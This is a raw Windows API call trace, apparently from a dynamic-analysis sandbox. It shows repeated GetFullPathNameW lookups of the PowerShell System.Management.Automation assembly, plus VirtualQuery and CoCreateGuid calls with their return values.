	[0225.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.310] GetLastError () returned 0x0
	[0225.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.310] GetLastError () returned 0x0
	[0225.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.310] GetLastError () returned 0x0
	[0225.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.310] GetLastError () returned 0x0
	[0225.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.310] GetLastError () returned 0x0
	[0225.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.310] GetLastError () returned 0x0
	[0225.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.310] GetLastError () returned 0x0
	[0225.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.310] GetLastError () returned 0x0
	[0225.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.311] GetLastError () returned 0x0
	[0225.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.311] GetLastError () returned 0x0
	[0225.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.311] GetLastError () returned 0x0
	[0225.311] VirtualQuery (in: lpAddress=0x10d6e0, lpBuffer=0x10e6e0, dwLength=0x1c | out: lpBuffer=0x10e6e0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.311] GetLastError () returned 0x0
	[0225.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.311] GetLastError () returned 0x0
	[0225.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.405] GetLastError () returned 0x0
	[0225.405] VirtualQuery (in: lpAddress=0x10d6e0, lpBuffer=0x10e6e0, dwLength=0x1c | out: lpBuffer=0x10e6e0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.406] GetLastError () returned 0x0
	[0225.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.406] GetLastError () returned 0x0
	[0225.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.406] GetLastError () returned 0x0
	[0225.406] VirtualQuery (in: lpAddress=0x10d6e0, lpBuffer=0x10e6e0, dwLength=0x1c | out: lpBuffer=0x10e6e0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.407] VirtualQuery (in: lpAddress=0x10d678, lpBuffer=0x10e678, dwLength=0x1c | out: lpBuffer=0x10e678*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.407] VirtualQuery (in: lpAddress=0x10d6b4, lpBuffer=0x10e6b4, dwLength=0x1c | out: lpBuffer=0x10e6b4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.408] VirtualQuery (in: lpAddress=0x10d678, lpBuffer=0x10e678, dwLength=0x1c | out: lpBuffer=0x10e678*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.409] VirtualQuery (in: lpAddress=0x10d6b4, lpBuffer=0x10e6b4, dwLength=0x1c | out: lpBuffer=0x10e6b4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.409] VirtualQuery (in: lpAddress=0x10d6b4, lpBuffer=0x10e6b4, dwLength=0x1c | out: lpBuffer=0x10e6b4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.409] VirtualQuery (in: lpAddress=0x10d678, lpBuffer=0x10e678, dwLength=0x1c | out: lpBuffer=0x10e678*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.409] VirtualQuery (in: lpAddress=0x10d6b4, lpBuffer=0x10e6b4, dwLength=0x1c | out: lpBuffer=0x10e6b4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.410] VirtualQuery (in: lpAddress=0x10d678, lpBuffer=0x10e678, dwLength=0x1c | out: lpBuffer=0x10e678*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.410] VirtualQuery (in: lpAddress=0x10d6b4, lpBuffer=0x10e6b4, dwLength=0x1c | out: lpBuffer=0x10e6b4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.410] VirtualQuery (in: lpAddress=0x10d678, lpBuffer=0x10e678, dwLength=0x1c | out: lpBuffer=0x10e678*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.411] VirtualQuery (in: lpAddress=0x10d6b4, lpBuffer=0x10e6b4, dwLength=0x1c | out: lpBuffer=0x10e6b4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.411] VirtualQuery (in: lpAddress=0x10d51c, lpBuffer=0x10e51c, dwLength=0x1c | out: lpBuffer=0x10e51c*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.412] VirtualQuery (in: lpAddress=0x10d678, lpBuffer=0x10e678, dwLength=0x1c | out: lpBuffer=0x10e678*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.412] VirtualQuery (in: lpAddress=0x10d6b4, lpBuffer=0x10e6b4, dwLength=0x1c | out: lpBuffer=0x10e6b4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.413] VirtualQuery (in: lpAddress=0x10d678, lpBuffer=0x10e678, dwLength=0x1c | out: lpBuffer=0x10e678*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.413] VirtualQuery (in: lpAddress=0x10d6b4, lpBuffer=0x10e6b4, dwLength=0x1c | out: lpBuffer=0x10e6b4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.414] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xdc93ef44, Data2=0x8754, Data3=0x4b28, Data4=([0]=0x9c, [1]=0xd4, [2]=0xa, [3]=0xf9, [4]=0xfc, [5]=0xe7, [6]=0x98, [7]=0x55))) returned 0x0
	[0225.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e138, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.414] GetLastError () returned 0x0
	[0225.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.414] GetLastError () returned 0x0
	[0225.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.414] GetLastError () returned 0x0
	[0225.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e138, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.414] GetLastError () returned 0x0
	[0225.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.414] GetLastError () returned 0x0
	[0225.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.414] GetLastError () returned 0x0
	[0225.414] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xecf2148f, Data2=0xdce4, Data3=0x4ead, Data4=([0]=0x91, [1]=0x84, [2]=0x93, [3]=0x60, [4]=0xb, [5]=0x12, [6]=0x10, [7]=0xf9))) returned 0x0
	[0225.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e138, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.415] GetLastError () returned 0x0
	[0225.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.415] GetLastError () returned 0x0
	[0225.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.415] GetLastError () returned 0x0
	[0225.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e138, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.415] GetLastError () returned 0x0
	[0225.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.415] GetLastError () returned 0x0
	[0225.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.415] GetLastError () returned 0x0
	[0225.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.415] GetLastError () returned 0x0
	[0225.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.415] GetLastError () returned 0x0
	[0225.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.415] GetLastError () returned 0x0
	[0225.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10df00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.416] GetLastError () returned 0x0
	[0225.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.416] GetLastError () returned 0x0
	[0225.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.416] GetLastError () returned 0x0
	[0225.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.416] GetLastError () returned 0x0
	[0225.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.416] GetLastError () returned 0x0
	[0225.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.416] GetLastError () returned 0x0
	[0225.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.416] GetLastError () returned 0x0
	[0225.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.416] GetLastError () returned 0x0
	[0225.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.416] GetLastError () returned 0x0
	[0225.417] VirtualQuery (in: lpAddress=0x10d2d4, lpBuffer=0x10e2d4, dwLength=0x1c | out: lpBuffer=0x10e2d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.417] GetLastError () returned 0x0
	[0225.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.417] GetLastError () returned 0x0
	[0225.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.417] GetLastError () returned 0x0
	[0225.417] VirtualQuery (in: lpAddress=0x10d2d4, lpBuffer=0x10e2d4, dwLength=0x1c | out: lpBuffer=0x10e2d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.418] VirtualQuery (in: lpAddress=0x10d310, lpBuffer=0x10e310, dwLength=0x1c | out: lpBuffer=0x10e310*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dcc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.418] GetLastError () returned 0x0
	[0225.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dc78, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.418] GetLastError () returned 0x0
	[0225.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dc78, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.419] GetLastError () returned 0x0
